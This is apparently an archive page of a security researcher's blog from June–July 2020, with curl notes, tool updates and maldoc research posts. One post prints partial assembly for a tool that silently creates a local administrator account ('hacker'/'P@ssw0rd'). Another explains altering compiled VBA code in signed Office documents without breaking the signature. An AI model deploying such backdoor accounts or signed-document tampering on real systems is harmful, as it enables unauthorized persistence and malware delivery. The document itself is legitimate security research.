Didier Stevens

Sunday 12 July 2020

Quickpost: curl

Filed under: Networking,Quickpost — Didier Stevens @ 0:00

Since I learned that Windows 10 has curl pre-installed now, I notice I use it more often.

Here are some quick notes, mainly for myself:


Using Tor:

curl --socks5-hostname http://didierstevens.com

Option socks5-hostname uses SOCKS5 protocol and does name resolution of the hostname via the SOCKS5 protocol (and not local DNS)


Removing the User-Agent header:

curl --header "User-Agent:" http://didierstevens.com

Option –header (-H) can also be used to remove a header: provide the header name with colon, provide no header value.


Using a custom User-Agent header (-A –user-agent):

curl --user-agent "Mozilla/5.0 DidierStevens" http://didierstevens.com


Saving received data:

curl --dump-header 01.headers --output 01.bin.vir --trace 01.trace --trace-time http://didierstevens.com

Option —dump-header (-D) saves the headers, option –output (-o) saves the body, –trace creates a trace file and –trace-time adds timestamps to the trace file.


Option to ignore certificate errors: -k –insecure


Putting it all together:

curl --socks5-hostname --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" --insecure --dump-header 01.headers --output 01.data --trace 01.trace --trace-time https://didierstevens.com


Quickpost info

Tuesday 7 July 2020

Tampering With Digitally Signed VBA Projects

Filed under: maldoc — Didier Stevens @ 0:00

As I explained in blog post VBA Purging, VBA code contained in Module Streams is made up of compiled code (PerformanceCache) and source code (CompressedSourceCode).

If you alter the compiled code (PerformanceCache) properly and leave the source code (CompressedSourceCode) of a signed VBA project untouched, you can change the behavior of a signed document without invalidating the signature. That’s because the code signing algorithm for VBA projects does not take the PerformanceCache into account.

Details in my NVISO blog post: Tampering with Digitally Signed VBA Projects


Friday 3 July 2020

Update: base64dump.py Version 0.0.12

Filed under: My Software,Update — Didier Stevens @ 0:00

This new version of base64dump.py adds the following new features:

  • encoding zxc (0x4D,0x5A,0x90,…)
  • update for YARA rules
  • update for –cut option
  • option -A: run-length encoded HEX/ASCII dump
  • warning when no encoding was selected
  • environment variable to set hash algorithm (DSS_DEFAULT_HASH_ALGORITHMS)
  • option –jsonoutput
  • option -T: headtail
  • option -p: process encodings
  • Python 3 support

base64dump_V0_0_12.zip (https)
MD5: 834B0D2DB5915ECE1C2F016B9E8462D1
SHA256: 952A5009C945AF350DB0875E8F025E3B5D271FB54AC60BE7569CFBD949DD7B77

Wednesday 1 July 2020

Overview of Content Published in June

Filed under: Announcement — Didier Stevens @ 16:00

Here is an overview of content I published in June:

Blog posts:

YouTube videos:

Videoblog posts:

SANS ISC Diary entries:

NVISO blog posts:

Monday 22 June 2020

VBA Purging

Filed under: maldoc — Didier Stevens @ 0:00

VBA code contained in Module Streams is made up of compiled code (PerformanceCache) and source code (CompressedSourceCode).

VBA stomping consist in altering or suppressing CompressedSourceCode and leaving the PerformanceCache unchanged:

As you can imagine, it must also be possible to change the PerformanceCache and leaving CompressedSourceCode unchanged:

Suppressing the PerformanceCache is a technique that I call VBA Purging:

More details can be found in a blog post I wrote here.

Tuesday 16 June 2020

FalsePositive GitHub Repository

Filed under: Announcement — Didier Stevens @ 0:00

As I’m fed up with Google’s false positives on some of my tools on DidierStevens.com, I’m moving them to a new GitHub repository: FalsePositives.

FYI, here is their User Agent String:

Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) AppEngine-Google; (+http://code.google.com/appengine; appid: s~virustotalcloud)

Monday 8 June 2020

Update: translate.py Version 2.5.8

Filed under: My Software,Update — Didier Stevens @ 20:14

This is a small Python 3 bugfix version.

translate_v2_5_8.zip (https)
MD5: 677BD5D6007F264A05D23A9A01B3DD13
SHA256: 977D7A87F771F5E86A6B57D2B565D7C789A7AC7696599E8B7412E9051D66DCFF

Wednesday 3 June 2020

add-admin: Tiny EXE To Add Administrative Account

Filed under: My Software — Didier Stevens @ 0:00

I wrote a tiny EXE program (1,5 KB) that creates an account and adds it to the local administrators group.

It’s written in 32-bit assembly code (it’s not shellcode), and needs to be assembled with nasm and then linked to a PE file.

The first 3 %define statements define the account name, password and local group.

; Assembly code to add a new local user and make it member of Administrators group
; Written for NASM assembler (http://www.nasm.us) by Didier Stevens
; https://DidierStevens.com
; Use at your own risk
; Build:
;   nasm -f win32 add-admin.asm
;   Microsoft linker:
;     link /fixed /debug:none /EMITPOGOPHASEINFO /entry:main add-admin.obj kernel32.lib netapi32.lib
;       https://blog.didierstevens.com/2018/11/26/quickpost-compiling-with-build-tools-for-visual-studio-2017/
;       /fixed -> no relocation section
;       /debug:none /EMITPOGOPHASEINFO -> https://stackoverflow.com/questions/45538668/remove-image-debug-directory-from-rdata-section
;       /filealign:256 -> smaller, but no valid exe
;   MinGW linker:
;     ld -L /c/msys64/mingw32/i686-w64-mingw32/lib --strip-all add-admin.obj -l netapi32 -l kernel32
; History:
;   2020/03/13
;   2020/03/14 refactor
;   2020/03/15 refactor


%define USERNAME 'hacker'
%define PASSWORD 'P@ssw0rd'
%define ADMINISTRATORS 'administrators'

global _main
extern _NetUserAdd@16
extern _NetLocalGroupAddMembers@20
extern _ExitProcess@4

	struc USER_INFO_1
		.uName RESD 1
		.Password RESD 1
		.PasswordAge RESD 1
		.Privilege RESD 1
		.HomeDir RESD 1
		.Comment RESD 1
		.Flags RESD 1
		.ScriptPath RESD 1
		.lgrmi3_domainandname RESD 1


	section .text
	mov     ebp, esp
	sub     esp, 4
	; NetUserAdd(NULL, level=1, buffer, NULL)
	lea     eax, [ebp-4]
	push    eax
	push    UI1
	push    1
	push    0
	call    _NetUserAdd@16
	; NetLocalGroupAddMembers(NULL, administrators, level=3, buffer, 1)
	push    1
	push    LMI3
	push    3
	push    0
	call    _NetLocalGroupAddMembers@20
	; ExitProcess(0)
	push    0
	call    _ExitProcess@4

; uncomment next line to put data structure in .data section (increases size PE file because of extra .data section)
;	section .data

	istruc USER_INFO_1
		at USER_INFO_1.PasswordAge, dd 0
		at USER_INFO_1.Privilege, dd USER_PRIV_USER
		at USER_INFO_1.HomeDir, dd 0
		at USER_INFO_1.Comment, dd 0
		at USER_INFO_1.Flags, dd UF_SCRIPT
		at USER_INFO_1.ScriptPath, dd 0

	db      __utf16le__(USERNAME), 0, 0

	db      __utf16le__(PASSWORD), 0, 0

	db      __utf16le__(ADMINISTRATORS), 0, 0

		at LOCALGROUP_MEMBERS_INFO_3.lgrmi3_domainandname, dd USERNAME_UNICODE

Monday 1 June 2020

Overview of Content Published in May

Filed under: Announcement — Didier Stevens @ 0:00

Here is an overview of content I published in May:

Blog posts:

YouTube videos:

Videoblog posts:

SANS ISC Diary entries:

Saturday 30 May 2020

New Tool: simple_ip_stats.py

Filed under: My Software,Networking — Didier Stevens @ 9:50

Some time ago, I created a tool to calculate the entropy of TCP data for a colleague. And a bit later, he asked me for a tool for UDP.

I have now merged these 2 tools, and added support for other protocols transported by IPv4 and IPv6. And I will no longer maintain simple_tcp_stats.py and simple_udp_stats.py.

This new tool simple_ip_stats.py is a Python program that reads pcap files and produces simple statistics for each IP connection per protocol.

For the moment, it calculates the entropy of the data (without packet reassembling) of each connection (both directions) and reports this in a CSV file:

TCP;;’GET ‘;364;5.42858024035
TCP;;’GET ‘;426;5.46464090792

simple_ip_stats_V0_0_1.zip (https)
MD5: 0482F3667E4EE6444350D9B0A146F764
SHA256: 480DCF2C82030EF996A6C1C3FEFCAAB77C000EC72DECA91329298C9BCC578BAD

« Previous PageNext Page »

Blog at WordPress.com.